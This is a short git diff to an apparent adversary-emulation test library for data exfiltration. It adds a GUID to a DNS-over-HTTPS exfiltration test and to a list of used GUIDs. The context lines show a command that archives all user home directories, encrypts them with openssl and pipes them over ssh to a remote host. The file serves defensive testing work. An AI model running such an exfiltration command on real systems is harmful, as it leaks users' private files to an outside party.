diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index 2b2ebca0..59b48d90 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -50,6 +50,7 @@ atomic_tests: tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' name: sh - name: DNSExfiltration (doh) + auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48 description: | DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel. !!! Test will fail without a domain under your control with A record and NS record !!! diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index ce79f56e..97a83011 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -795,3 +795,4 @@ e03ada14-0980-4107-aff1-7783b2b59bb1 69119e58-96db-4110-ad27-954e48f3bb13 3d111226-d09a-4911-8715-fe11664f960d 1289f78d-22d2-4590-ac76-166737e1811b +c943d285-ada3-45ca-b3aa-7cd6500c6a48